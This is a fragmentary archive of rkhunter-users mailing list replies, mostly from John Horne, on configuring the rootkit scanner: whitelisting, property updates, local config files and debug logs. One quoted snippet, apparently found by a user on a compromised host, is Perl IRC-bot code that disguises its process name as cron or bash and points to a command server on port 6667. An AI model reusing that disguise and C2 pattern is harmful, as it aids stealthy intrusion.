ikipedia shows it on
>
> http://en.wikipedia.org/wiki/Rkhunter
>
Wow. Didn't know there was a wikipedia entry! :-) However it lists it as
the 'Old rkhunter web page'.
See the official web page at the bottom
On Tue, 2010-05-25 at 09:34 -0700, Duane Loftus wrote:
> OK, time for dumb questions.
>
> 1. John Horne says: It hasn't installed properly, try re-installing.
> The INSTALLDIR option must exist for RKH to run.
>
> Is there any guidance on re-installing?
>
Yes, look in
KH,
then send us the output of the installer.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
--
___
Rkhunter-users mailing lis
ackage manager option. FC6 won't be updated anymore, so all
the current package files should correspond to their entries in the RPM
database.
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
' config
file ('/etc/rkhunter.conf.local'). This way when you next upgrade RKH,
you do not have to modify the newly installed rkhunter.conf as all your
settings will be in your local file.
John.
--
John Horne, University of Plymouth
alone, and
then run RKH. Then only modify those options which cause a warning,
everything else will be automatically detected.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587
es not need option 'Protocol' to be set?
>
No. From the config file:
...If the 'Protocol' option has not been set in the SSH
# configuration file, then a value of '2' may be set here in order to
# suppress a warning message.
So set it to '2
When RKH runs it will look at '/etc/rkhunter.conf', but will then look
at '/etc/rkhunter.conf.local' (if it exists) and override any previously
set options.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
-147 lib]# more random-seed
>
You can't list it (using 'more'), because it is a binary/data file not a
text file. See the 'file' command for help on that.
John.
--
John Horne, University of Plymouth, UK
Tel: +4
run 'rkhunter --update --propupd' as I said? If not, then do it
now.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
h '--propupd', then changed the config to use
the package manager ('PKGMGR=RPM'). This would then make your current
file properties report many warnings. If you change the config to use,
or not use, the package manager for checks, then you must run 'rkhunter
--propupd'
>
A default install will put the rkhunter command into /usr/local/bin. So
the full pathname should be '/usr/local/bin/rkhunter'.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
--
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
t from lsmod, and found nothing
in /proc/modules.
For Fedora I would expect some modules to be loaded. However, if that is
how your system runs (possibly due to plesk?), then you can disable the
test. Copy the DISABLED_TESTS line from /etc/rkhunter.conf, and paste it
into /etc/rkhunter.conf.local.
bitch.
>
As far as I am aware rkhunter doesn't care whether a directory has the
setgid bit set or not. I would say, leave the above ALLOWHIDDENDIR
option in your config file, and reset the permissions on the directory.
John.
--
John Horne, Univers
isable the 'apps' test completely.
2) Whitelist each of the applications - for example:
APP_WHITELIST="httpd named openssl"
3) Install more up-to-date versions of the applications.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)
go by the colour of the test result. If it's not red then don't worry
about it. The skipped tests will be yellow simply to indicate that you
may want to install the re
red.
>
Run rkhunter ('rkhunter -c') directly from a terminal, physical console
or xterm.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
On Tue, 2010-06-01 at 22:33 +0100, Adam McGreggor wrote:
> On Sun, May 30, 2010 at 10:07:40PM +0100, John Horne wrote:
> > On Sun, 2010-05-30 at 21:27 +0100, Adam McGreggor wrote:
> > > I have a directory, /etc/.svn, which is setgid (2775/drwxrwsrx).
> > >
>
> 32-bit system. Any x86_64 /usr/lib64 probs should have been gone
> long time ago, our build process doesn't default to /usr/lib64
> (should be /usr/local anyway), so I'm looking for confirmation this
> is a RPMForge packager problem.
>
Hi,
Tee file will on its way
You could just set it to something like /var/tmp. However, I
think /dev/shm was used because it is memory-resident, and so less
intensive for the test.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
't like the colon (:) characters.
Already fixed in the CVS version though.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
Alternative is to use the current CVS version of rkhunter.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
w the servers CPU usage going up and
down regularly. In that respect I have gotten used to it, and the users
don't seem to notice it. Obviously if the usage stays high (or low!),
then it is investigated.
John.
--
John Horne, University of Ply
unning RKH with '--debug' might have indicated
why.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
ific files. (In your case it would be the 'hdparm' string
in the /etc/rc.d/rc.sysinit and bootlogd files. This means you don't
have to whitelist the files from all rootkit checks.)
At the moment you will have to whitelist the files
atever command you use to run rkhunter and add the
'--debug' option to it please. Then email me the resulting output file
in /tmp. Also can you email me the log file
(usually /var/log/rkhunter.log).
Thanks,
John.
of the
whitelisting options are allowed to be specified more than once.
I'll email you a drop-in corrected version of the 'rkhunter' program (it
will still be version 1.3.6), that will allow your configuration above.
It also contains the fix for the Mandriva 'rkhunter /b
looks as if the program ran. The 'lsmod'
command starts with a header line containing 'Module', and 'ipv6' and
'nf_conntrack_ipv4' are certainly module names.
What I would like to see is the rkhunter log file for this, or better
still output from a run when the
n email me the log file (/var/log/rkhunter.log). Thanks.
>
> I figure that maybe I need to run rkhunter --propupd
>
Nope, that's got nothing to do with it.
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
un 'rkhunter --debug --version' and then email me (not the list)
the file that is created in /tmp (named rkhunter-debug...). It should
contain enough info to see what is going on.
John.
--
John Horne Tel: +44 (0)1752 587287
Univers
it does. If you really want to
specify exactly what should be checked, and what shouldn't, then maybe
something like Aide or Tripwire would be more suitable.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
directories will be searched as well.
Option 'b' can be achieved by setting
USER_FILEPROP_FILES_DIRS="/usr/local/libexec", again other directories
will be searched.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
On Wed, 2010-08-11 at 16:25 -0700, Jonny Kent wrote:
>
>
>
> err maybe that is a new flag. where is USER_FILEPROP_FILES_DIRS
> documented? so I can't answer you fully.
>
Sorry, that was added in at version 1.3.6. Your original post said you
were running 1.3.4 I th
art). By
default it is not enabled, so you must have set USE_LOCKING=1 in the
config file.
To remove the lock file simply run:
rkhunter --unlock
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
On Wed, 2010-08-18 at 20:07 -0400, Mike Strickland wrote:
> On Wed, 2010-08-18 at 21:35 +0100, John Horne wrote:
> > This is rkhunter's locking mechanism to prevent 2 or more instances of
> > RKH running together (and so messing up the log file for a start). By
> > def
t is waiting for the lock, and show a count of the number of seconds
in increments of 10 seconds. It will wait a maximum of 300 seconds (5
mins), but that is configurable. After that time it gives up.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287
On Sat, 2010-08-21 at 16:30 -0700, Conrad Schuler wrote:
> In the rkhunter.conf file it says to burn the rkhunter.dat to a CD and
> link to it.
>
?? Where on earth does it say that?
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)17
'system'.
>
The test is for complete file names, not partial matches - so
'.../system' matches, but '.../system_bus_socket' will not. Without
seeing the lsof output, which has obviously changed by now, it is
impossible to say what was matched.
The test has been improve
On Mon, 2010-09-13 at 02:59 +0300, Nerijus Baliunas wrote:
> On Thu, 09 Sep 2010 10:21:56 +0100 John Horne
> wrote:
>
> > The test is for complete file names, not partial matches - so
> > '.../system' matches, but '.../system_bus_socket' will not. With
On Mon, 2010-09-13 at 14:14 +0300, Nerijus Baliunas wrote:
> On Mon, 13 Sep 2010 11:56:03 +0100 John Horne
> wrote:
>
> > > I have similar problem with wine. When there are no wine apps running,
> > > I get no warning, but with wine running I get the warning.
> >
)
Seen by sched_rr_get_interval()
# ps p 13864
PID TTY STAT TIME COMMAND
# unhide.rb|wc -l
3287
# unhide.rb|grep '^ Seen by ps'|wc -l
295
I only showed the last PID found, but as can be seen it says it has
found 295 suspicious PIDs.
J
On Thu, 2010-09-16 at 17:29 +0200, unsp...@hushmail.com wrote:
> Hello John,
>
> On Tue, 14 Sep 2010 15:59:39 +0200 John Horne
> wrote:
> >I seem to get quite a few FP's from this:
>
> Do those still occur after using Walles' fix posted on SF?
>
No, th
d for file '/usr/local/bin/perl' in the
> rkhunter.dat file.
>
What are the other values of USER_FILEPROP_FILES_DIRS you have
configured?
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)
hide sys" output is :
> "HIDDEN Processes Found: number_of_hidden_processes"
>
Thanks for reporting this. It has been fixed in the next release.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
rom the RKH config file:
# NOTE: Only files and directories which have been added by the user,
# and are not part of the internal lists, can be excluded. So, for
# example, it is not possible to exclude the 'ps' command by using
# '!/bin/ps'. These will be silently ignore
is whitelisted
>
> Am I missing anything? Do I have to whitelist apache2 with no specified
> file? Any suggestion?
>
What have you put into the RKH config file for this?
John.
--
John Horne, Universit
On Tue, 2010-09-28 at 10:26 +0200, William Maddler wrote:
> On 27/09/2010 23:47, John Horne wrote:
> > On Mon, 2010-09-27 at 12:53 +0200, William Maddler wrote:
> >> Hello,
> >> I keep getting a warning for apache2 using deleted files:
> >>
> >> [12:01
On Thu, 2010-10-21 at 13:05 +0200, Leon Waldman wrote:
>
> Can any one tell me if it's possible to pass individual
> filenames/paths to the propupd option?
>
Yes it is if you are running version 1.3.6. Look at the man page.
John.
--
John Horne, University of Plymouth, UK
' letter, and not the same as the lowercase 'c' letter which is short
for the '--check' option. Using '-C' (or '--checkconfig') simply runs
through the configuration files and checks that they look okay, it then
exits. It will not display anything if all
s 'head -1 /var/lib/rkhunter/db/i18n/en' show?
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
that instance RKH looks in the config file to
see what tests are enabled, which by default is 'all'.
When running specific tests I tend to just use:
rkhunter --enable hidden_procs
That is all that is required. If more than one test is to run, then just
comma-separate them or use mult
On Tue, 2010-11-02 at 06:34 +0100, Patrick Gouin wrote:
> Le 01/11/2010 18:51, John Horne a écrit :
> > On Mon, 2010-11-01 at 17:02 +0100, Patrick Gouin wrote:
> >
> > Okay, but why does your path have a directory name with a trailing '/'?
> > I'
[ Found ]
> [20:21:27] Info: Found syslog configuration file: /etc/syslog.conf
>
> RKH should probably look only for the config file corresponding to
> the syslog utility it found just before.
>
I don't quite follow this. Are you saying:
1) that /etc/syslog.conf is a symbol
unning?
> >
> >
> That's exactly what I mean except I would have written check instead of
> show..
>
Okay, I'll take a look and see if we can do something.
John.
--
John Horne, University of Plym
s, but I'll save them for a separate email and if I run
> into any further issues I'll be back.
>
Okay, thanks again.
One point, OS X does not have a /dev/shm directory, so if you want to
run 'suspscan', then I tend to use:
SUSPSCAN_TEMP=/var/lib/rkhunter/tmp
or wherever y
it is doing. We should probably add 'launchd' itself to the list of
monitored files for OS X as well (if we haven't already).
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
ux/UNIX
exploit with Boonana, only OS X and MS Windows. As such, at the moment,
Boonana is only tested for on OS X.
Obviously, anyone with any Linux/UNIX details, then please let us
know :-)
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax
ver, OS X does not generally use the file. Passwords are
maintained in a database, and not the passwd file. As far as I could
gather the file *may* be used in some instances when sorting out
problems with the machine.
In that respect, it is not a full check of the user passwords, but may
well be bet
Hello,
If you have installed the new release of rkhunter (1.3.8), would you
ensure you run 'rkhunter --update' after installation please. One of
the data files had a small error in it which has now been corrected.
Thanks,
John.
--
John Horne Tel: +44 (0)1
uration option: Invalid directory found: ./
> >
> > Could you help me?
> >
The BINDIR option, if not set on the command-line or in the config file,
will use the root PATH variable. In this instance it seems the user has
a relative path in PATH, and that is what RKH is complaining abou
> Any ideas please?
>
I can't see anything obviously wrong. Can you run:
rkhunter --enable deleted_files --debug
and email me the debug file created in /tmp.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
On Sat, 2010-11-20 at 16:30 +, John Horne wrote:
> On Sat, 2010-11-20 at 14:17 +, Dick Gevers wrote:
> > Hi,
> >
> > 1.3.8 works fine for me. Thanks for the latest version!
> >
> > Except it says in the logs:
> >
> > [23:51:10] Info: Sta
ions of RKH. New versions were released to coincide with 1.3.8 being
released. As such users of 1.3.6 (and before) may well see results
different from previously if they have run 'rkhunter --update' bec
le hidden_ports" but in my case that gave me:
> "Info: Unable to find the 'unhide-tcp' command"
>
Exactly. If your system doesn't have the unhide-tcp command then the
check cannot run. It is disabled by default because most people won't
have that command in
R_FILEPROP_FILES_DIR option.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
ss it's already known much longer, because i read an article about it,
> in a "hackin9"-magazine from 2004!
>
Ping now added into CVS version.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)17
tem will re-prelink the files, and
then the verification will pass. Alternatively, do as RKH suggests, run
the 'prelink' command on the files - or use 'prelink -a' - and that
should take care of it. Or you could disable prelinking completely of
course.
John.
--
Joh
ecause of the timestamp. The
only thing I can suggest is to do a comparison with the timestamps
removed. Something like:
cat rkhunter.log | cut -d' ' -f2- >/tmp/rkh1
cat rkhunter.log.old | cut -d' ' -f2- >/tmp/rkh2
diff rkh1 rkh2
It is not ideal, but usable.
summary).
>
You can combine options to get just the summary. Try using '-q
--summary'.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
s
>
> which is clearly conflicting.
>
No it's not. That is the 'hidden_ports' test.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
ly.
As far as I am aware RKH has no '--file' option.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
On Mon, 2011-01-17 at 11:33 -0500, James R. Marcus wrote:
> Some of my machines are behind a strict firewall, is there a recommended
> single mirror for RKHunter updates?
>
rkhunter.sourceforge.net
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +4
sh/sshd_config most other OSes use?
>
Yes, OSX does use /etc/sshd_config. It will be necessary to add to the
users config file: RTKT_FILE_WHITELIST=/etc/sshd_config
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1
On Tue, 2011-01-25 at 12:18 -0500, d...@456ny.com wrote:
> appreciate the response.
>
> how do i attach the log.
> i cannot even locate the log file within osx
>
The log file path is by default /var/log/rkhunter.log
John.
--
John Horne, University of Plymouth, UK
Tel: +44
On Fri, 2011-02-04 at 11:24 +0100, Torfinn Ingolfsen wrote:
> Hello,
>
> I'm running rkhunter under FreeBSD. I have done so for many years.
> After upgrading to rkhunter version 1.3.8,
>
Did you run 'rkhunter --propupd' after upgrading?
John.
--
John Horne
On Fri, 2011-02-04 at 14:03 +0100, Torfinn Ingolfsen wrote:
> Hi,
>
> On Fri, Feb 4, 2011 at 12:36 PM, John Horne wrote:
> > On Fri, 2011-02-04 at 11:24 +0100, Torfinn Ingolfsen wrote:
> >> Hello,
> >>
> >> I'm running rkhunter under FreeBSD. I ha
On Fri, 2011-02-04 at 17:58 +0100, Torfinn Ingolfsen wrote:
> Hi,
>
>
> On Fri, Feb 4, 2011 at 2:58 PM, John Horne wrote:
> > Do you use the USER_FILEPROP_FILES_DIRS option at all in your config
> > file(s)? If so can you show me what they are.
>
> I use the confi
at the lists of filenames
as newline delimited, but that would then mean that users would have to
enter each file on a separate line in the config file (whereas at
present they can use space-separated lists).
In answer to Kevin, as far as I can tell it is not possible to include a
filenam
get their servers back up and
running then the link should work again.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
; -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
> my $processo = $ps[rand scalar @ps];
>
> $servidor='marvimex.hacked.jp' unless $servidor;
> my $porta='6667
m (or md5, sha1) commands in
the root PATH. If they are not found, then rkhunter will use its own
sha1/md5 perl function but only if perl is available.
Can you run 'rkhunter --list perl' please. If it shows the Digest::MD5
and SHA1 modules installed, then can you check that the p
On Mon, 2011-02-28 at 01:22 +0100, Boris Cuber wrote:
> (Btw., md5sum _is_ in the root path)
>
Sorry, just noticed this bit. Look in the /var/log/rkhunter.log file and
ensure that the PATH used by RKH is what you expect it to be (and that
md5sum is in that path).
John.
--
John
mand I think). Yet on a
non-prelinked system the mtime and ctime are unchanged but the atime is.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
On Thu, 2011-04-21 at 16:25 +0200, Carlos Oliva wrote:
>
> I think a good add-on for rkhunter is inspect the MD5 of the packages,
>
Try the 'DPKG' package manager option in the config file.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax:
; root
> ===
>
> As a result, now have received notification by e-mail "warning" .
> I want to receive which is not "[ Warning ]" message, but "[ Bad ]" message.
>
> how to achieve this?
>
>
Generally you can't. The only way you could do th
. What bug?
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
> to see. I have commented out each prior to each string in hope not to
> spread anything or cause any problems. They appear to be make or load
> with some international connotation
>
Does the rkhunter log file not say which file it is found in?
John.
--
John Horne, University of
't tried this version myself, but the
later versions offered more options which may provide more info.
http://www.unhide-forensics.info/?Download
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
n.
>
Hello,
Many thanks for this. The problem has already been fixed in the CVS
version of rkhunter.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
give it a go and see if it fixes
the problem.
Thanks,
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
will still monitor
it for any future changes.
If the fix for the 'file' command is included in a subsequent Fedora
'rkhunter' package, and you install that (via yum), then you should
remove the config file option above and let the package manager revert
to monitoring the progra
ROP_FILES_DIRS="/usr/bin/mc68000 /usr/bin/mc68010 /usr/bin/mc68020
/usr/bin/mc68030 /usr/bin/mc68040 /usr/bin/m68k /usr/bin/sun2 /usr/bin/sun3
/usr/bin/sun3x /usr/bin/u370"
Then run 'rkhunter --propupd'.
John.
--
John Horne Tel: +44 (0)1752 587287
University of
g ]
> /usr/ucb/file[ Warning ]
>
You will need to look in the log file (/var/log/rkhunter.log) to see why
these warnings occur.
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
lo,
Yes, the SCRIPTWHITELIST option will whitelist commands which are
scripts so use the lines above (they are included in the rkhunter.conf
file just as examples).
John.
--
John Horne Tel: +44 (0)1752 587287
University
[ Warning ]
> [08:05:51] Warning: The file properties have changed:
> myhost : Mon Jun 27, 08:17:25 : ~
> #
>
> Anyone got any idea what could be causing this?
>
Hello,
What version of rkhunter are you using? Also can you show us the full
log entry for one of the files
On Mon, 2011-06-27 at 12:40 -0400, Tanstaafl wrote:
> Thanks for the help John...
>
> On 2011-06-27 10:57 AM, John Horne wrote:
> > What version of rkhunter are you using?
>
> 1.3.8
>
> > Also can you show us the full log entry for one of the files with a
> >
On Tue, 2011-06-28 at 10:54 -0400, Tanstaafl wrote:
> On 2011-06-27 5:24 PM, John Horne wrote:
> > The stored time is the modification time on the file when '--propupd'
> > was last used, not the time when '--propupd' was run.
>
> Ok, I guess I'm ju
On Tue, 2011-06-28 at 14:26 -0400, Tanstaafl wrote:
> On 2011-06-28 1:27 PM, John Horne wrote:
> > When you run 'rkhunter --propupd' it creates a local database of the
> > files to be monitored and records the modification date/time of each
> > file. That date/time